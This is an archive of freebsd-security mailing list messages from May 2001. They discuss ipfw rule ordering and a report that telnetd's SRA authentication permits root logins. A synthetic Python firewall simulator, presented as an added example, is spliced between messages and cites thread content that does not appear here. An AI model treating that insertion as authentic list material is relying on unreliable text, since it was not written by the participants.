> BTW: if i add TCP_DROP_SYNFIN, it should affect the setup option in my
> firewall? if it is, how?

See the rc.conf(5) man page.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu May 10 2:13:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A5C3937B423 for ; Thu, 10 May 2001 02:13:49 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64606; Thu, 10 May 2001 11:13:40 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: nate@yogotech.com (Nate Williams)
Cc: Michael Sharp , FreeBSD-security@FreeBSD.ORG
Subject: Re: Ip filtering with ipfw
References: <20010509160500.7232.cpmta@c000.sfo.cp.net> <15097.44134.876784.259823@nomad.yogotech.com>
From: Dag-Erling Smorgrav
Date: 10 May 2001 11:13:39 +0200
In-Reply-To: <15097.44134.876784.259823@nomad.yogotech.com>
Message-ID:
Lines: 17
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams writes:
> This is the default 'open' setup, yes, and happens because you added the
> following (mentioned in another email).
>
> > SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT to my
> > kernel and recompiled.
>
> Otherwise, rule 65000 wouldn't have existed.

Wrong. The ruleset above is from a machine that doesn't have
IPFIREWALL_DEFAULT_TO_ACCEPT, otherwise rule 65535 would be "allow ip from
any to any" instead of "deny ip from any to any". Rule 65000 was added by
/etc/rc.firewall, which knows nothing about kernel options.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu May 10 2:18:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 1278537B423 for ; Thu, 10 May 2001 02:18:29 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64646; Thu, 10 May 2001 11:18:24 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: nate@yogotech.com (Nate Williams)
Cc: Michael Sharp , FreeBSD-security@FreeBSD.ORG
Subject: Re: ipfw
References: <20010509200335.7680.cpmta@c000.sfo.cp.net> <15097.44366.138725.618271@nomad.yogotech.com>
From: Dag-Erling Smorgrav
Date: 10 May 2001 11:18:23 +0200
In-Reply-To: <15097.44366.138725.618271@nomad.yogotech.com>
Message-ID:
Lines: 10
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams writes:
> Not true. Rules are processed in order, and if you don't give a rule
> number I don't know the order that a rule is inserted on the list.

The new rule is inserted at highest existing rule number (except 65535)
+ 100.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu May 10 2:22:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D615137B423 for ; Thu, 10 May 2001 02:22:18 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64668; Thu, 10 May 2001 11:22:16 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Michael Sharp
Cc: FreeBSD-security@FreeBSD.ORG
Subject: Re: ipfw
References: <20010509201853.6521.cpmta@c000.sfo.cp.net>
From: Dag-Erling Smorgrav
Date: 10 May 2001 11:22:14 +0200
In-Reply-To: <20010509201853.6521.cpmta@c000.sfo.cp.net>
Message-ID:
Lines: 16
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael Sharp writes:
> But I need to block port 113, and allow 1 machine to get to port
> 113. HAVING to add ipfw add allow ip from any to any gets processed
> before I would allow my 1 machine to port 113, thus allowing every
> machine to port 113

How about this: go read the ipfw(8) from top to bottom, paying particular
attention to the EXAMPLES section; then browse /etc/rc.firewall. Having read
this material, if you still don't understand how ipfw works, feel free to ask
questions on the -questions mailing list. The -security list is for security
issues, not for "can't be bothered to read the docs" issues.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu May 10 9:39:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 8131537B422 for ; Thu, 10 May 2001 09:39:15 -0700 (PDT) (envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA27126; Thu, 10 May 2001 10:39:07 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA21302; Thu, 10 May 2001 10:39:07 -0600 (MDT) (envelope-from nate)
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15098.50218.467751.103251@nomad.yogotech.com>
Date: Thu, 10 May 2001 10:39:06 -0600 (MDT)
To: Dag-Erling Smorgrav
Cc: nate@yogotech.com (Nate Williams), Michael Sharp , FreeBSD-security@FreeBSD.ORG
Subject: Re: ipfw
In-Reply-To:
References: <20010509200335.7680.cpmta@c000.sfo.cp.net> <15097.44366.138725.618271@nomad.yogotech.com>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Not true. Rules are processed in order, and if you don't give a rule
> > number I don't know the order that a rule is inserted on the list.
>
> The new rule is inserted at highest existing rule number (except
> 65535) + 100.

Ahh, this explains why the new rules aren't being seen (because of rule
65000).

I would have thought the rules would have been added to the 'top' of the
ruleset.
Nate

From owner-freebsd-security Thu May 10 9:51:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id AA31F37B422 for ; Thu, 10 May 2001 09:51:39 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 59052 invoked by uid 1000); 10 May 2001 16:51:05 -0000
Date: Thu, 10 May 2001 19:51:05 +0300
From: Peter Pentchev
To: Nate Williams
Cc: Dag-Erling Smorgrav , Michael Sharp , FreeBSD-security@FreeBSD.ORG
Subject: Re: ipfw
Message-ID: <20010510195105.D56859@ringworld.oblivion.bg>
Mail-Followup-To: Nate Williams , Dag-Erling Smorgrav , Michael Sharp , FreeBSD-security@FreeBSD.ORG
References: <20010509200335.7680.cpmta@c000.sfo.cp.net> <15097.44366.138725.618271@nomad.yogotech.com> <15098.50218.467751.103251@nomad.yogotech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <15098.50218.467751.103251@nomad.yogotech.com>; from nate@yogotech.com on Thu, May 10, 2001 at 10:39:06AM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, May 10, 2001 at 10:39:06AM -0600, Nate Williams wrote:
> > > Not true. Rules are processed in order, and if you don't give a rule
> > > number I don't know the order that a rule is inserted on the list.
> >
> > The new rule is inserted at highest existing rule number (except
> > 65535) + 100.
>
> Ahh, this explains why the new rules aren't being seen (because of rule
> 65000).
>
> I would have thought the rules would have been added to the 'top' of the
> ruleset.

Nope, they're added to the bottom, so that if you add several rules one by
one, they'll be executed in the order you added them.

G'luck,
Peter

--
This would easier understand fewer had omitted.
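The whole ipfw exchange above (the fixed rule 65535 and what IPFIREWALL_DEFAULT_TO_ACCEPT does to it, a numberless `ipfw add` landing at the highest existing number plus 100 and therefore behind the 65000 allow, the `auth` port on the identd allow, and separate tcp/udp denies instead of `all`) condensed into a small first-match simulator. This is an added example, not code from the thread or from FreeBSD: it models only the behaviour the replies describe, reads the poster's "x10" interface as xl0, and uses 198.51.100.7 as a constructed "some other DALnet server" address.

```python
"""ipfw(8) first-match simulator for the rule-ordering question in this thread.
Added example, not FreeBSD code. It models only what the replies state: rules are
walked in ascending number to the first match; 65535 is the fixed default rule (deny,
or allow with IPFIREWALL_DEFAULT_TO_ACCEPT); a numberless `ipfw add` gets the highest
existing number (excluding 65535) plus 100; a port range needs tcp or udp, not `all`.
Packets, the 198.51.100.7 peer and the interface name xl0 are constructed for the demo."""
import ipaddress
from collections import namedtuple

DEFAULT_RULE = 65535
AUTO_STEP = 100
# ports: (lo, hi) destination-port range or None; direction/iface None = any
Rule = namedtuple("Rule", "number action proto src dst ports direction iface")
Packet = namedtuple("Packet", "proto src dst dport direction iface")

def _addr_match(spec, addr):
    return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

def _parse_ports(tok):  # "0-1023", "113" or the service name "auth" (identd)
    if "-" in tok:
        return tuple(int(x) for x in tok.split("-", 1))
    p = 113 if tok == "auth" else int(tok)
    return p, p

class Ipfw:
    def __init__(self, default_action="deny"):
        self.rules = {DEFAULT_RULE: Rule(DEFAULT_RULE, default_action, "ip", "any", "any", None, None, None)}

    def add(self, spec, number=None):
        """ipfw add [number] <action> <proto> from <src> to <dst> [ports] [in|out] [via ifc]"""
        t = spec.split()
        action, proto, src, dst = t[0], "ip" if t[1] == "all" else t[1], t[3], t[5]
        ports = direction = iface = None
        i = 6
        while i < len(t):
            if t[i] in ("in", "out"):
                direction = t[i]
            elif t[i] == "via":
                i, iface = i + 1, t[i + 1]
            else:
                ports = _parse_ports(t[i])
            i += 1
        if ports is not None and proto == "ip":
            raise ValueError("a port range needs tcp or udp, not 'all'")
        if number is None:  # a numberless add lands behind every rule but 65535
            others = [n for n in self.rules if n != DEFAULT_RULE]
            number = max(others) + AUTO_STEP if others else AUTO_STEP
        self.rules[number] = Rule(number, action, proto, src, dst, ports, direction, iface)
        return number

    def flush(self):  # ipfw -f flush: everything goes except the default rule
        self.rules = {DEFAULT_RULE: self.rules[DEFAULT_RULE]}

    def check(self, pkt):  # walk rules in number order; the first match decides
        for n in sorted(self.rules):
            r = self.rules[n]
            if (r.proto in ("ip", pkt.proto)
                    and _addr_match(r.src, pkt.src) and _addr_match(r.dst, pkt.dst)
                    and (r.ports is None or r.ports[0] <= pkt.dport <= r.ports[1])
                    and r.direction in (None, pkt.direction) and r.iface in (None, pkt.iface)):
                return n, r.action

def rc_firewall_open(fw):  # the ruleset firewall_type="open" installs, as listed above
    fw.add("allow ip from any to any via lo0", 100)
    fw.add("deny ip from any to 127.0.0.0/8", 200)
    fw.add("deny ip from 127.0.0.0/8 to any", 300)
    fw.add("allow ip from any to any", 65000)

IDENT_FROM_DALNET = Packet("tcp", "199.163.7.34", "192.168.1.3", 113, "in", "xl0")
IDENT_FROM_OTHER = Packet("tcp", "198.51.100.7", "192.168.1.3", 113, "in", "xl0")
WEB_FROM_OTHER = Packet("tcp", "198.51.100.7", "192.168.1.3", 8080, "in", "xl0")

def poster_ruleset():  # bare adds land at 65100/65200, behind the 65000 allow
    fw = Ipfw()
    rc_firewall_open(fw)
    numbers = [fw.add("allow tcp from 199.163.7.34 to 192.168.1.3 in via xl0"),
               fw.add("deny tcp from any to 192.168.1.3 0-1023 in via xl0")]
    return numbers, fw.check(IDENT_FROM_OTHER)

def fixed_ruleset():  # numbers below 65000, `auth` on the allow, tcp and udp denies
    fw = Ipfw()
    rc_firewall_open(fw)
    fw.add("allow tcp from 199.163.7.34 to 192.168.1.3 auth in via xl0", 1000)
    fw.add("deny tcp from any to 192.168.1.3 0-1023 in via xl0", 1100)
    fw.add("deny udp from any to 192.168.1.3 0-1023 in via xl0", 1200)
    return fw.check(IDENT_FROM_DALNET), fw.check(IDENT_FROM_OTHER), fw.check(WEB_FROM_OTHER)

def all_with_ports_rejected():  # the poster's `deny all ... 0-1023` is refused outright
    try:
        Ipfw().add("deny all from any to 192.168.1.3 0-1023 in via xl0")
    except ValueError:
        return True
    return False

def after_flush(default_action="deny"):  # only 65535 is left, and its action decides
    fw = Ipfw(default_action)
    rc_firewall_open(fw)
    fw.flush()
    return fw.check(WEB_FROM_OTHER)
```

The two rulesets give the answer the thread converges on: with bare adds the other host's identd probe is decided by rule 65000 (allow), with explicit numbers it is decided by 1100 (deny) while 199.163.7.34 is still allowed by 1000 and unrelated ports still fall through to 65000. On a real 4.x box the equivalent check is `ipfw list` after the adds, which shows the 65100/65200 numbers.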
From owner-freebsd-security Thu May 10 17:47:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail4.enter.net (mail4.enter.net [63.65.0.24]) by hub.freebsd.org (Postfix) with ESMTP id AFFEB37B422 for ; Thu, 10 May 2001 17:47:32 -0700 (PDT) (envelope-from dh@enter.net)
Received: from enter.net (bsder.enter.net [63.94.128.138]) by mail4.enter.net (8.11.2/8.11.2) with ESMTP id f4B0xx797055 for ; Thu, 10 May 2001 20:59:59 -0400 (EDT)
Message-ID: <3AFB369D.5574182A@enter.net>
Date: Thu, 10 May 2001 20:47:25 -0400
From: Daniel Hauer
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.4.0-11mdk i586)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello all,

After installing 4.3 release on one machine and upgrading 2 other machines
to -STABLE, I noticed there is a new mechanism used in telnetd, namely this
"SRA" authentication mechanism. While convenient, (you don't have to type
your username) I found something VERY disturbing:

If you are at a root prompt on any other BSD based machine, you can just
telnet to the 4.3 machines, and login right in with the root username and
password! This only apparently occurs from a BSD based machine, as my
co-worker and I tried it from 2 different distribution Linux boxes, and we
could not login as root.

None of the switches for telnetd in the inetd.conf worked to our
satisfaction, and after reading the sources, we recompiled telnetd with
AUTHENTICATION=NO to disable this behavior.

What is this "SRA authentication"? And why is telnetd's default behavior to
allow root logins at all?
I realize that any self-respecting sysadmin will either use ipfirewall,
ipfilter, or good old inetd's hosts.allow file to limit telnet logins anyway,
but the question still remains.... Why? Wouldn't this SRA with a "no root"
login be a better idea?

--
Regards,
Daniel Hauer
Network Administration
http://www.enter.net
"The Road To The Internet Starts There!"
***************************************************************************
Windoze is for GAMES, UNIX is for the rest of us.
UNIX is like the sights on a loaded gun. If you aim the gun at your foot and
pull the trigger, it is the basic function of UNIX to accurately deliver the
bullet from the gun to the target. In this case, it's your foot.
***************************************************************************

From owner-freebsd-security Thu May 10 21: 9:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 04EE737B422 for ; Thu, 10 May 2001 21:09:12 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from chimp (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4B49AV00304 for ; Fri, 11 May 2001 00:09:11 -0400 (EDT) (envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010511000303.036916f8@192.168.0.12>
X-Sender: mdtancsa@192.168.0.12
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Fri, 11 May 2001 00:09:09 -0400
To: security@freebsd.org
From: Mike Tancsa
Subject: preventing direct root login on telnetd
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Is there a way to prevent root from logging in directly on STABLE via
telnet?
---Mike
--------------------------------------------------------------------
Mike Tancsa,                                tel +1 519 651 3400
Network Administration,                     mike@sentex.net
Sentex Communications                       www.sentex.net
Cambridge, Ontario Canada                   www.sentex.net/mike

From owner-freebsd-security Thu May 10 23: 0:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gobbe.net (gobbe.net [212.83.113.102]) by hub.freebsd.org (Postfix) with ESMTP id 0A66937B423 for ; Thu, 10 May 2001 23:00:43 -0700 (PDT) (envelope-from gobbe@gobbe.net)
Received: from localhost (gobbe@localhost) by gobbe.net (8.9.3/8.9.3) with ESMTP id IAA03746; Fri, 11 May 2001 08:57:15 +0300 (EEST) (envelope-from gobbe@gobbe.net)
Date: Fri, 11 May 2001 08:57:15 +0300 (EEST)
From: Jussi Jaurola
To: Mike Tancsa
Cc: security@FreeBSD.ORG
Subject: Re: preventing direct root login on telnetd
In-Reply-To: <4.2.2.20010511000303.036916f8@192.168.0.12>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Use /etc/hosts.allow. But I think that the telnet protocol is so crappy
that you should use ssh instead?

--
Jussi P. Jaurola                    Network Security Engineer
gobbe@gobbe.net                     Netello Systems, Ltd.
http://gobbe.net                    +358 50 566 9183

On Fri, 11 May 2001, Mike Tancsa wrote:

>
> Is there a way to prevent root from logging in directly on STABLE via
> telnet?
>
> ---Mike
> --------------------------------------------------------------------
> Mike Tancsa,                                tel +1 519 651 3400
> Network Administration,                     mike@sentex.net
> Sentex Communications                       www.sentex.net
> Cambridge, Ontario Canada                   www.sentex.net/mike
>

From owner-freebsd-security Thu May 10 23:36:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from public.guangzhou.gd.cn (mail1-smtp.guangzhou.gd.cn [202.105.65.221]) by hub.freebsd.org (Postfix) with SMTP id CAC3537B423 for ; Thu, 10 May 2001 23:36:21 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from rep1([61.140.208.60]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm43afbc9b4; Fri, 11 May 2001 06:34:29 -0000
Message-ID: <004b01c0d9e4$a3bb35e0$5801a8c0@suntop.com>
From: "edwin chan"
To:
Subject: I expect a answer about SRA
Date: Fri, 11 May 2001 14:35:58 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0048_01C0DA27.B168F7C0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I expect an answer about SRA too.

From owner-freebsd-security Fri May 11 0:21:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 5CA5737B422 for ; Fri, 11 May 2001 00:21:20 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu)
Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA15214; Fri, 11 May 2001 09:21:18 +0200 (MET DST)
Received: (from zgabor@localhost) by zg.CoDe.hu (8.11.3/8.11.1) id f4B7JmC00321; Fri, 11 May 2001 07:19:48 GMT (envelope-from zgabor)
Date: Fri, 11 May 2001 07:19:47 +0000
From: Gabor Zahemszky
To: freebsd-security@freebsd.org
Cc: mike@sentex.net
Subject: Re: preventing direct root login on telnetd
Message-ID: <20010511071947.C264@zg.CoDe.hu>
References: <4.2.2.20010511000303.036916f8@192.168.0.12>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <4.2.2.20010511000303.036916f8@192.168.0.12>; from mike@sentex.net on Fri, May 11, 2001 at 12:09:09AM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 11, 2001 at 12:09:09AM -0400, Mike Tancsa wrote:
>
> Is there a way to prevent root from logging in directly on STABLE via telnet ?

Direct root logins are enabled/disabled via /etc/ttys, aren't they?

---
# status        Must be on or off.  If on, init will run the getty program on
#               the specified port.  If the word "secure" appears, this tty
#               allows root login.
---
# Pseudo terminals
ttyp0   none                    network on  secure
ttyp1   none                    network off
---

Or maybe via the /etc/login.access file.  man login.access

Btw.  Don't use telnet, and never login as root.  Use `su' instead.

ZGabor at CoDe dot HU

--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

From owner-freebsd-security  Fri May 11  0:42:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5])
        by hub.freebsd.org (Postfix) with ESMTP id 44BC637B422
        for ; Fri, 11 May 2001 00:42:20 -0700 (PDT)
        (envelope-from poige@morning.ru)
Received: from NIC1 ([195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3)
        with ESMTP id PAA91577; Fri, 11 May 2001 15:42:00 +0800 (KRAST)
        (envelope-from poige@morning.ru)
Date: Fri, 11 May 2001 15:44:42 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091
Organization: Morning Network
X-Priority: 3 (Normal)
Message-ID: <911676911.20010511154442@morning.ru>
To: Jussi Jaurola
Cc: Mike Tancsa , security@FreeBSD.ORG
Subject: Re[2]: preventing direct root login on telnetd
In-Reply-To:
References:
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Use /etc/hosts.allow.

it doesn't allow limiting logins by user name...

> But I think that telnet protocol is so crappy that
> use ssh instead?

--
Igor                            mailto:poige@morning.ru

From owner-freebsd-security  Fri May 11  0:48:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gobbe.net (gobbe.net [212.83.113.102])
        by hub.freebsd.org (Postfix) with ESMTP id 58BEF37B423
        for ; Fri, 11 May 2001 00:48:49 -0700 (PDT)
        (envelope-from gobbe@gobbe.net)
Received: from localhost (gobbe@localhost) by gobbe.net (8.9.3/8.9.3)
        with ESMTP id KAA04082; Fri, 11 May 2001 10:45:16 +0300 (EEST)
        (envelope-from gobbe@gobbe.net)
Date: Fri, 11 May 2001 10:45:15 +0300 (EEST)
From: Jussi Jaurola
To: Igor Podlesny
Cc: Mike Tancsa , security@FreeBSD.ORG
Subject: Re: Re[2]: preventing direct root login on telnetd
In-Reply-To: <911676911.20010511154442@morning.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Oh yeah, sorry :) I misunderstood your meaning. But why don't you just
use ssh? It's much more reliable and better than telnet.

--
Jussi P. Jaurola       Network Security Engineer
gobbe@gobbe.net        Netello Systems, Ltd.
http://gobbe.net       +358 50 566 9183

On Fri, 11 May 2001, Igor Podlesny wrote:

>
> > Use /etc/hosts.allow.
> it doesn't allow limiting logins by user name...
>
> > But I think that telnet protocol is so crappy that
> > use ssh instead?
>
> --
> Igor                            mailto:poige@morning.ru
>

From owner-freebsd-security  Fri May 11  0:53:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5])
        by hub.freebsd.org (Postfix) with ESMTP id D4E5F37B422
        for ; Fri, 11 May 2001 00:53:32 -0700 (PDT)
        (envelope-from poige@morning.ru)
Received: from NIC1 ([195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3)
        with ESMTP id PAA92131; Fri, 11 May 2001 15:53:25 +0800 (KRAST)
        (envelope-from poige@morning.ru)
Date: Fri, 11 May 2001 15:56:08 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091
Organization: Morning Network
X-Priority: 3 (Normal)
Message-ID: <1182362066.20010511155608@morning.ru>
To: Jussi Jaurola
Cc: Mike Tancsa , security@FreeBSD.ORG
Subject: Re[4]: preventing direct root login on telnetd
In-Reply-To:
References:
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Oh yeah, sorry :) I misunderstood your meaning.
> But why don't you just
> use ssh?

i do -- you're mistaken again -- it was another person's question...

> It's much more reliable and better than telnet.

--
Igor                            mailto:poige@morning.ru

From owner-freebsd-security  Fri May 11  2:41:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155])
        by hub.freebsd.org (Postfix) with ESMTP id 2F09837B422
        for ; Fri, 11 May 2001 02:41:06 -0700 (PDT)
        (envelope-from slack@www.suntop-cn.com)
Received: from rep1 ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3)
        with SMTP id f4B7FPx28544 for ; Fri, 11 May 2001 15:15:25 +0800 (CST)
        (envelope-from slack@www.suntop-cn.com)
Message-ID: <007d01c0d9ea$27560f60$5801a8c0@suntop.com>
From: "edwin chan"
To:
Subject: SRA
Date: Fri, 11 May 2001 15:15:21 +0800
X-Mailer: Microsoft Outlook Express 5.00.2615.200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
When I log in from a FreeBSD box to another FreeBSD box, the SRA login
prompt appears, but from a Win98 box to a FreeBSD box no SRA prompt
appears (both FreeBSD boxes running version 4.3).

I searched many documents but couldn't find even a mention of SRA.

From owner-freebsd-security  Fri May 11  2:41:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155])
        by hub.freebsd.org (Postfix) with ESMTP id 1B89B37B424
        for ; Fri, 11 May 2001 02:41:10 -0700 (PDT)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from rep1 ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3)
        with SMTP id f4B6XCx28427 for ; Fri, 11 May 2001 14:33:13 +0800 (CST)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Message-ID: <004201c0d9e4$419db7c0$5801a8c0@suntop.com>
From: "edwin chan"
To:
References:
Subject: Re: preventing direct root login on telnetd
Date: Fri, 11 May 2001 14:33:08 +0800
X-Mailer: Microsoft Outlook Express 5.00.2615.200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I expect to have an answer about SRA.


----- Original Message -----
From: Jussi Jaurola <gobbe@gobbe.net>
To: Mike Tancsa <mike@sentex.net>
Cc: <security@FreeBSD.ORG>
Sent: Friday, May 11, 2001 1:57 PM
Subject: Re: preventing direct root login on telnetd


> Use /etc/hosts.allow. But I think that telnet protocol is so crappy that
> use ssh instead?
>
> --
> Jussi P. Jaurola       Network Security Engineer
> gobbe@gobbe.net        Netello Systems, Ltd.
> http://gobbe.net       +358 50 566 9183
>
>
> On Fri, 11 May 2001, Mike Tancsa wrote:
>
> >
> > Is there a way to prevent root from logging in directly on STABLE via telnet ?
> >
> > ---Mike
> > --------------------------------------------------------------------
> > Mike Tancsa,                                          tel +1 519 651 3400
> > Network Administration,       mike@sentex.net
> > Sentex Communications                   www.sentex.net
> > Cambridge, Ontario Canada   www.sentex.net/mike
> >
>

From owner-freebsd-security  Fri May 11  2:46:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155])
        by hub.freebsd.org (Postfix) with ESMTP id 5C42237B422
        for ; Fri, 11 May 2001 02:43:47 -0700 (PDT)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from gate.suntop.com ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3)
        with ESMTP id f4B1mKx27215 for ; Fri, 11 May 2001 09:48:30 +0800 (CST)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Received: from rep1 (rep1.suntop.com [192.168.1.88]) by gate.suntop.com (8.11.3/8.11.3)
        with SMTP id f485kCa20466 for ; Tue, 8 May 2001 13:46:13 +0800 (CST)
        (envelope-from huacheng@public.guangzhou.gd.cn)
Message-ID: <000c01c0d782$32179320$5801a8c0@suntop.com>
From: "edwin chan"
To:
References: <20010507123414.X2167-100000@citadel.simphost.com>
Subject: Re: SRA..
